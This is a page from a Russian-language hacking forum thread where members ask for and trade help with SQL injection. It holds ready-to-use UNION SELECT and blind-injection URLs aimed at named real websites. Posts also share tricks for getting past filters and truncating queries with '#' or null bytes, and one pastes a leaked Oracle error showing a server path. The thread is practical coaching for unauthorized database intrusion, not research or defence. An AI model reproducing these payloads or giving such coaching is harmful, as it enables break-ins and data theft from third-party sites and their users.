Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Nizhegorodets

    Nizhegorodets Member

    Joined:
    21 Mar 2009
    Messages:
    80
    Likes Received:
    66
    Reputations:
    9
    спасибо пойду гуглить...
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    2 aqqa

    http://www.spravkaweb.ru/php'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/'1'='1

    Вместо 1 подбирай имя столбца =)
     
    1 person likes this.
  3. aqqa

    aqqa Banned

    Joined:
    12 Jul 2008
    Messages:
    96
    Likes Received:
    16
    Reputations:
    3
    А вот нашел кое что круое

    Warning: oci_execute(): ORA-01460: unimplemented or unreasonable conversion requested in /srv/www/apache2/htdocs/cms_adm/lib/44/oracle.class.php on line 95
    array (
    0 => 'http://www.spravkaweb.ru/php\'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/\'1\'=\'1',
    1 => '',
    )
    аракловская база линуксовый сервак,
     
  4. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Добрый день всем !

    Возникли трудности с сайтом! SQL-inj есть а вот вывод настроить не получается...
    Доступ к mysql.user и information_schema.columns закрыты =(
    http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4--

    Как можно обойти это?

    Заранее спасибо!
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Snap, там 4 ветка - информатион_счема вообще нету

    Юзай мор1ров, подбирай имя таблицы

    http://www.delocrat.ru/index.php?productID=1324+and+1=if(ascii(substring((select+1+from+[имя_табл]+limit+0,1),1,1))>1,1,(select+1+union+select+2))

    Либо попробуй найти вывод в других местах
     
  6. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from+information_schema.columns--

     
    1 person likes this.
  7. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Ты ошибку то читал.....
    те так и пишут
     
  8. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Snap, напиши так

    http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from+skjdhfjkshk234k34h.columns--

    Будет

    Из этого по твоему следует, что существует база skjdhfjkshk234k34h к которой у нас нету доступа ?)
     
    1 person likes this.
  9. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Натолкнулся на mysql инъекцию в многострочном запросе,
    Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?
     
  10. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    попробуй # в качестве комментария
     
  11. }{@r}{imon

    }{@r}{imon New Member

    Joined:
    9 May 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    потскажите если на сайте версия 4,0,2 какие могут быть таблицы старые не идут
     
  12. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Вставил - в запросе не появляется. Подставил как %23 - появилась, но комментится так же одна строка
     
  13. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    prescott, попробуй обрезать нуль-байтом.
    К примеру:
    http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
    http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7
     
    1 person likes this.
  14. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    маниа.ком ?

    Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5
     
    1 person likes this.
  15. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    первое что попробовал - не помогло
    Тоже уже сплоит работает =)
     
  16. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    prescott,
    #%0A# проверь
     
  17. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Это сути дела не меняет(перевод строки то останется в старом запросе), будет:
    Попробуй продолжить запрос, например:
    правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):
     
    #7457 PaCo, 9 Jun 2009
    Last edited: 9 Jun 2009
  18. Bilyak

    Bilyak New Member

    Joined:
    14 Jul 2008
    Messages:
    22
    Likes Received:
    3
    Reputations:
    2
    Здравствуйте, прошу помочь обойти фильтры в скуле:

    http://www.terra.mu/list.php?c=download&s=title&o=&p=&w=asc%2527
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Мало того, что там инъекция после order by ПОЛЕ, еще и фильрация (кривая, но пашущая). Хз, получиться ли что-то из этого.
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    ttp://www.otoptravel.com/Qua.php?id=1
    MsSQL. Не выводятся даные.
     
Thread Status:
Not open for further replies.